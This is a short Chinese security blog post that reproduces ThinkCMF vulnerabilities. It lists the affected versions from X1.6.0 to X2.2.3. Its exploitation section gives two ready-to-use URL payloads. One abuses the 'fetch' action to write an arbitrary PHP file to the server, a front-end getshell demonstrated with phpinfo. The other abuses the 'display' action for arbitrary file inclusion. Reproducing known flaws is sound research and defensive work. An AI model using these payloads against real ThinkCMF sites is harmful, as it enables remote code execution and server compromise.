ThinkCMF 任意包含漏洞附前台Getshell复现
2019-11-15 16:03:41 Author: www.safeinfo.me(查看原文) 阅读量:938 收藏

发表于 | 分类于 |

字数统计: 377 | 阅读时长 ≈ 1


简介

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。
ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

漏洞简介

攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

漏洞利用

第一种 前台Getshell

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件
phpinfo版payload如下:

1
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

随即访问 test.php

第二种 任意文件包含

通过构造a参数的display方法,实现任意内容包含漏洞
payload:

1
?a=display&templateFile=README.md

复现完毕 漏洞分析请参考如下文章

ThinkCMF任意包含漏洞分析及复现

ApiCoder wechat

扫一扫,加入信安圈。

0%


文章来源: https://www.safeinfo.me/2019/11/15/ThinkCMF-%E4%BB%BB%E6%84%8F%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E9%99%84%E5%89%8D%E5%8F%B0Getshell%E5%A4%8D%E7%8E%B0.html
如有侵权请联系:admin#unsafe.sh